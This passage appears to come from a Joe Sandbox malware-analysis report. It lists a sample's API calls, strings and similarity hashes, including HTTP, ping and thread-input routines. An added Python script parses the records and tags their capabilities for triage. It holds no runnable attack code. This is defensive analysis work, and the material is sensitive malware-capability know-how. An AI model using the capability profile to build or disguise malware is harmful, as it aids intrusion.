                                                        Similarity
                                                        • API ID: Error$Mode$DiskFreeLastSpace
                                                        • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                        • API String ID: 4194297153-14809454
                                                        • Opcode ID: 4061c1522594410bffdec7c47697b3b2ddb91315e17d6610ed19936c06e5b914
                                                        • Instruction ID: d8b130484adce1cb3cb10df38f1e4e5fe1ff5dcb7757c1ddd4164aeb741274b6
                                                        • Opcode Fuzzy Hash: 4061c1522594410bffdec7c47697b3b2ddb91315e17d6610ed19936c06e5b914
                                                        • Instruction Fuzzy Hash: 9731B235A00219DFCB00DF68E989EAE7BB4FF09314F148069F615DB291DB74DA82CB81
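The records above are only useful for triage once they are out of the flattened listing: the routine whose String ID is "Ping" (WSAStartup, gethostbyname, IcmpCreateFile, IcmpSendEcho) and the drive-status routine around GetDiskFreeSpaceW (string table INVALID, NOTREADY, READONLY, READY, UNKNOWN) read very differently from the COM-instantiation and AttachThreadInput functions once each record is a structured object with its API list, its strings and a coarse capability tag. The following Python script is an added example, not Joe Sandbox's code and not part of this report: it parses records in the APIs / Similarity format shown on this page, keeps each record's String ID and API String ID, and tags a function as "network", "com-instantiation", "input-control" or "drive-probe". The regexes, the capability table and the condensed SAMPLE_REPORT text are my own constructions (the sample is condensed from three of the records on this page); Joe Sandbox's own API ID and API String ID hashing is not reproduced.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field
# One API line of a record, e.g. "• IcmpSendEcho.IPHLPAPI(?,00000005), ref: 00835862"
# or "• Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862".
API_RE = re.compile(
    r"^(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_]\w*)\.(?P<module>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$")
# Key/value lines of the Similarity block, e.g. "• String ID: Ping".
FIELD_RE = re.compile(r"^(?:•\s*)?(?P<key>[A-Za-z ]+?):\s*(?P<val>.*)$")
# Assumed capability tags (mine, not Joe Sandbox's), keyed on module or API name.
CAPABILITIES = {
    "network": ({"WSOCK32", "WS2_32", "IPHLPAPI", "WININET"}, set()),
    "com-instantiation": (set(), {"CoCreateInstance", "CoGetObject"}),
    "input-control": (set(), {"AttachThreadInput", "BlockInput"}),
    "drive-probe": (set(), {"GetDiskFreeSpaceW", "GetDriveTypeW"}),
}

@dataclass
class ApiCall:
    name: str
    module: str
    args: list[str]
    ref: int                       # call-site address in the dump
    subcall_of: int | None = None  # set when the call sits in a callee

@dataclass
class FunctionRecord:
    apis: list[ApiCall] = field(default_factory=list)
    strings: list[str] = field(default_factory=list)
    api_string_id: str = ""

    @property
    def entry(self) -> int | None:  # lowest direct call site: where to look in IDA
        direct = [a.ref for a in self.apis if a.subcall_of is None]
        return min(direct) if direct else None

def parse_records(text: str) -> list[FunctionRecord]:
    records: list[FunctionRecord] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line == "APIs":  # every record opens with its API list
            current = FunctionRecord()
            records.append(current)
            continue
        if not line or current is None:
            continue
        m = API_RE.match(line)
        if m:
            args = m["args"].split(",") if m["args"] else []
            sub = int(m["sub"], 16) if m["sub"] else None
            current.apis.append(ApiCall(m["name"], m["module"].upper(), args, int(m["ref"], 16), sub))
            continue
        m = FIELD_RE.match(line)  # other bullet lines: keep only the two fields we use
        if m and m["key"] == "String ID":
            current.strings = [s for s in m["val"].strip().split("$") if s]  # '$'-joined
        elif m and m["key"] == "API String ID":
            current.api_string_id = m["val"].strip()
    return records

def capabilities(rec: FunctionRecord) -> list[str]:
    found = set()
    for call in rec.apis:
        for tag, (modules, names) in CAPABILITIES.items():
            if call.module in modules or call.name in names:
                found.add(tag)
    return sorted(found)

# Constructed sample: three of the report's records, condensed to the lines the parser reads.
SAMPLE_REPORT = """\
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00835793
• IcmpCreateFile.IPHLPAPI ref: 008357F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00835862
Memory Dump Source
• Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
Similarity
• String ID: Ping
• API String ID: 1028309954-2246546115
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0082B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0082B546
• SetErrorMode.KERNEL32(00000000,READY), ref: 0082B5BD
Similarity
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
• API String ID: 4194297153-14809454
APIs
  • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
• CoInitialize.OLE32 ref: 00838403
• CoCreateInstance.OLE32(?,00000000,00000017,00852BEC,?), ref: 0083846E
Similarity
• String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
• API String ID: 834269672-1287834457
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE_REPORT):
        print(f"{rec.entry or 0:08X}  {capabilities(rec)}  {rec.strings}")
```

Subcall lines ("Part of subcall function ...") are kept but excluded from the entry address, so a record is located by its own call sites, not by a shared helper such as the __itow/__swprintf routine at 007C9837 that several records reference. Pasting a whole report section into SAMPLE_REPORT works unchanged, since every line that is not an API call or a String ID / API String ID field is ignored.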
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 00819014
                                                        • GetDlgCtrlID.USER32 ref: 0081901F
                                                        • GetParent.USER32 ref: 0081903B
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 0081903E
                                                        • GetDlgCtrlID.USER32(?), ref: 00819047
                                                        • GetParent.USER32(?), ref: 00819063
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 00819066
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 46a09c60be0e117cdae97d77ee942b299a97259e653656774aed21f9719fa98a
                                                        • Instruction ID: 9ff957fb2523d5f6c416f830a30c3256ae8ab9187252eafc1f311c203d47f2c2
                                                        • Opcode Fuzzy Hash: 46a09c60be0e117cdae97d77ee942b299a97259e653656774aed21f9719fa98a
                                                        • Instruction Fuzzy Hash: 9A21C774A00108BBDF04ABA4CC95EFEB778FF59310F104159F961D72A2DB795855DB20
                                                        APIs
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                          • Part of subcall function 0081AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0081AABC
                                                        • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 008190FD
                                                        • GetDlgCtrlID.USER32 ref: 00819108
                                                        • GetParent.USER32 ref: 00819124
                                                        • SendMessageW.USER32(00000000,?,00000111,?), ref: 00819127
                                                        • GetDlgCtrlID.USER32(?), ref: 00819130
                                                        • GetParent.USER32(?), ref: 0081914C
                                                        • SendMessageW.USER32(00000000,?,?,00000111), ref: 0081914F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$CtrlParent$ClassName_memmove
                                                        • String ID: ComboBox$ListBox
                                                        • API String ID: 1536045017-1403004172
                                                        • Opcode ID: 71d406a4de6c45f355fa74173d089529b222ab2c81fc644beb59953e6d32f4c5
                                                        • Instruction ID: 050a486b8366c4783558889387172cf404d99fcfbbbe3128b1093911b59fd5d8
                                                        • Opcode Fuzzy Hash: 71d406a4de6c45f355fa74173d089529b222ab2c81fc644beb59953e6d32f4c5
                                                        • Instruction Fuzzy Hash: B021D674A01108BBDF04ABA4CC89EFEBB78FF59300F004019F951D72A2DB795495DB21
                                                        APIs
                                                        • GetParent.USER32 ref: 0081916F
                                                        • GetClassNameW.USER32(00000000,?,00000100), ref: 00819184
                                                        • _wcscmp.LIBCMT ref: 00819196
                                                        • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 00819211
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ClassMessageNameParentSend_wcscmp
                                                        • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                        • API String ID: 1704125052-3381328864
                                                        • Opcode ID: 8ff18aa504ab076701fb6be9c6f61d71dae4db0670a79858c0c1126bb26f9e52
                                                        • Instruction ID: 43275d6048c6f357ded6f94955d430ab32d948497bc7b071ad51ead2842d5af6
                                                        • Opcode Fuzzy Hash: 8ff18aa504ab076701fb6be9c6f61d71dae4db0670a79858c0c1126bb26f9e52
                                                        • Instruction Fuzzy Hash: A2115C3A249307F9FA102624DC1EDE73B9CFF15320B200026FA24E10D6FE7DA8A19990
                                                        APIs
                                                        • VariantInit.OLEAUT32(?), ref: 008388D7
                                                        • CoInitialize.OLE32(00000000), ref: 00838904
                                                        • CoUninitialize.OLE32 ref: 0083890E
                                                        • GetRunningObjectTable.OLE32(00000000,?), ref: 00838A0E
                                                        • SetErrorMode.KERNEL32(00000001,00000029), ref: 00838B3B
                                                        • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002,?,00000001,00852C0C), ref: 00838B6F
                                                        • CoGetObject.OLE32(?,00000000,00852C0C,?), ref: 00838B92
                                                        • SetErrorMode.KERNEL32(00000000), ref: 00838BA5
                                                        • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 00838C25
                                                        • VariantClear.OLEAUT32(?), ref: 00838C35
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                        • String ID:
                                                        • API String ID: 2395222682-0
                                                        • Opcode ID: fafb995634dfdda50f9f64003021061eb2ab53125cdbdd3f2ae6e1158c77312b
                                                        • Instruction ID: 75455e1e55998776047456fedaac1400fa3db79ea55d4def1021ef19800c2e5a
                                                        • Opcode Fuzzy Hash: fafb995634dfdda50f9f64003021061eb2ab53125cdbdd3f2ae6e1158c77312b
                                                        • Instruction Fuzzy Hash: FEC1E1B1608305EFD700DF68C88492AB7E9FB89758F00496DF989DB251DB71ED06CB92
                                                        APIs
                                                        • SafeArrayGetVartype.OLEAUT32(00000000,?), ref: 00827A6C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ArraySafeVartype
                                                        • String ID:
                                                        • API String ID: 1725837607-0
                                                        • Opcode ID: 4bbf3f9115bee3ea4a55ad04358d9811683ac99452d3a4d0277852bf72a1a07e
                                                        • Instruction ID: 6726c43c5fd330e70c6bc2ef8c8710e5de69297d536d263308cae17fbaf65325
                                                        • Opcode Fuzzy Hash: 4bbf3f9115bee3ea4a55ad04358d9811683ac99452d3a4d0277852bf72a1a07e
                                                        • Instruction Fuzzy Hash: A6B1A07590422ADFDB10DFA6E885BBEB7F4FF09325F204429EA01E7241D734A981CB91
                                                        APIs
                                                        • GetCurrentThreadId.KERNEL32 ref: 008211F0
                                                        • GetForegroundWindow.USER32(00000000,?,?,?,?,?,00820268,?,00000001), ref: 00821204
                                                        • GetWindowThreadProcessId.USER32(00000000), ref: 0082120B
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 0082121A
                                                        • GetWindowThreadProcessId.USER32(?,00000000), ref: 0082122C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 00821245
                                                        • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,00820268,?,00000001), ref: 00821257
                                                        • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 0082129C
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 008212B1
                                                        • AttachThreadInput.USER32(00000000,00000000,00000000,?,?,?,?,?,00820268,?,00000001), ref: 008212BC
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                        • String ID:
                                                        • API String ID: 2156557900-0
                                                        • Opcode ID: 37c4aaa9c41989ce77c255de62059dce5d9a617a42d853292f33c88a5c5bedc1
                                                        • Instruction ID: b9c7e302073115d337de27b1093e4928a18a79b3e88f668f1e4e5dcf035afe7b
                                                        • Opcode Fuzzy Hash: 37c4aaa9c41989ce77c255de62059dce5d9a617a42d853292f33c88a5c5bedc1
                                                        • Instruction Fuzzy Hash: FC317CB9600214FBEF10DF58FD48B6A77A9FB65311F214129FA01D71A1EB749E80CB61
                                                        APIs
                                                        • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 007CFAA6
                                                        • OleUninitialize.OLE32(?,00000000), ref: 007CFB45
                                                        • UnregisterHotKey.USER32(?), ref: 007CFC9C
                                                        • DestroyWindow.USER32(?), ref: 008045D6
                                                        • FreeLibrary.KERNEL32(?), ref: 0080463B
                                                        • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00804668
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                        • String ID: close all
                                                        • API String ID: 469580280-3243417748
                                                        • Opcode ID: ee9b9bc388a2c04031db402299c0fc570b38be405e45d7f91ffc454075df1f33
                                                        • Instruction ID: cebaebd4fad7a27a15f254d07874ab33a229e5874ad95cf2b526b0b164bf20db
                                                        • Opcode Fuzzy Hash: ee9b9bc388a2c04031db402299c0fc570b38be405e45d7f91ffc454075df1f33
                                                        • Instruction Fuzzy Hash: 9CA14770301212CFDB69EF14C998F69B365FF15710F5042ADE90AAB2A2DB35AC56CF90
                                                        APIs
                                                        • EnumChildWindows.USER32(?,0081A439), ref: 0081A377
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ChildEnumWindows
                                                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT
                                                        • API String ID: 3555792229-1603158881
                                                        • Opcode ID: 2d1d35de19a45ad6ec70c2c721d859edb2cabdedf46c67361fb13a42d2e253a8
                                                        • Instruction ID: e89b6988fab00d4b07538b30043194f751d1555216b3ff6693fafd3beb051a0e
                                                        • Opcode Fuzzy Hash: 2d1d35de19a45ad6ec70c2c721d859edb2cabdedf46c67361fb13a42d2e253a8
                                                        • Instruction Fuzzy Hash: A2918131602609EACB0CDFA0C445BEDFBB8FF04304F548129E95AE7251DB35A9D9CB91
                                                        APIs
                                                        • IsWindow.USER32(00ED5230), ref: 0084B3EB
                                                        • IsWindowEnabled.USER32(00ED5230), ref: 0084B3F7
                                                        • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0084B4DB
                                                        • SendMessageW.USER32(00ED5230,000000B0,?,?), ref: 0084B512
                                                        • IsDlgButtonChecked.USER32(?,?), ref: 0084B54F
                                                        • GetWindowLongW.USER32(00ED5230,000000EC), ref: 0084B571
                                                        • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0084B589
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                        • String ID: 0R
                                                        • API String ID: 4072528602-1916035689
                                                        • Opcode ID: d43a86f3e334184e9d42cd82f356b2f3bc0d8d28ef57bdb60024ed3929ac342c
                                                        • Instruction ID: 12b0876320180ed2628dac7f203cc54ace12373ccddcbcaa9c67233d950b3098
                                                        • Opcode Fuzzy Hash: d43a86f3e334184e9d42cd82f356b2f3bc0d8d28ef57bdb60024ed3929ac342c
                                                        • Instruction Fuzzy Hash: C1718C38605208EFDB249F95C894FBABBB9FF1A300F144069EA45D73A2C731E951CB55
                                                        APIs
                                                        • SetWindowLongW.USER32(?,000000EB), ref: 007C2EAE
                                                          • Part of subcall function 007C1DB3: GetClientRect.USER32(?,?), ref: 007C1DDC
                                                          • Part of subcall function 007C1DB3: GetWindowRect.USER32(?,?), ref: 007C1E1D
                                                          • Part of subcall function 007C1DB3: ScreenToClient.USER32(?,?), ref: 007C1E45
                                                        • GetDC.USER32 ref: 007FCD32
                                                        • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 007FCD45
                                                        • SelectObject.GDI32(00000000,00000000), ref: 007FCD53
                                                        • SelectObject.GDI32(00000000,00000000), ref: 007FCD68
                                                        • ReleaseDC.USER32(?,00000000), ref: 007FCD70
                                                        • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 007FCDFB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                        • String ID: U
                                                        • API String ID: 4009187628-3372436214
                                                        • Opcode ID: acacb12621dc2c98860aa812375b240f0b5cb98157ea4b02e1c354701b5d99ae
                                                        • Instruction ID: 7b12fa4c8ff04fcb4ce1716830882a851000b20a2c0e62a5242b95ca1821d40a
                                                        • Opcode Fuzzy Hash: acacb12621dc2c98860aa812375b240f0b5cb98157ea4b02e1c354701b5d99ae
                                                        • Instruction Fuzzy Hash: 8671C03550020DDFCF269F64C984ABA7BB5FF49320F14427EEE55AA3A6C7388841DB61
                                                        APIs
                                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00831A50
                                                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00831A7C
                                                        • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 00831ABE
                                                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00831AD3
                                                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00831AE0
                                                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 00831B10
                                                        • InternetCloseHandle.WININET(00000000), ref: 00831B57
                                                          • Part of subcall function 00832483: GetLastError.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 00832498
                                                          • Part of subcall function 00832483: SetEvent.KERNEL32(?,?,00831817,00000000,00000000,00000001), ref: 008324AD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorEventHandleInfoLastOpenSend
                                                        • String ID:
                                                        • API String ID: 2603140658-3916222277
                                                        • Opcode ID: 9ffa4c3583fcd7f7f14de1769f06b43e0757e26af6138cc4d79e9d72cca52976
                                                        • Instruction ID: 4e94a9ea1a0517f37c3d87dfc5485c35d1a204b52c72c196871151193cf311bf
                                                        • Opcode Fuzzy Hash: 9ffa4c3583fcd7f7f14de1769f06b43e0757e26af6138cc4d79e9d72cca52976
                                                        • Instruction Fuzzy Hash: A84179B1501218BEEF119F60CC89FBABBACFB49754F00412AFA05DA141EB749E408BE0
                                                        APIs
                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 008462EC
                                                        • GetWindowLongW.USER32(00ED5230,000000F0), ref: 0084631F
                                                        • GetWindowLongW.USER32(00ED5230,000000F0), ref: 00846354
                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00846386
                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 008463B0
                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 008463C1
                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 008463DB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: LongWindow$MessageSend
                                                        • String ID: 0R
                                                        • API String ID: 2178440468-1916035689
                                                        • Opcode ID: b9da3ce56864ebc7e5a8e32cdc883362d0d986078af43a77f2343ba5aa629908
                                                        • Instruction ID: b30edfe52630a56cc5b3602c7ff5bbe3e356f037a95cfa2bdea35080df34ed1f
                                                        • Opcode Fuzzy Hash: b9da3ce56864ebc7e5a8e32cdc883362d0d986078af43a77f2343ba5aa629908
                                                        • Instruction Fuzzy Hash: A931EE38644299AFDB20CF18DC84F5937E1FB5A714F1901A9F601DB2B2DB71A8A0DB52
                                                        APIs
                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0084F910), ref: 00838D28
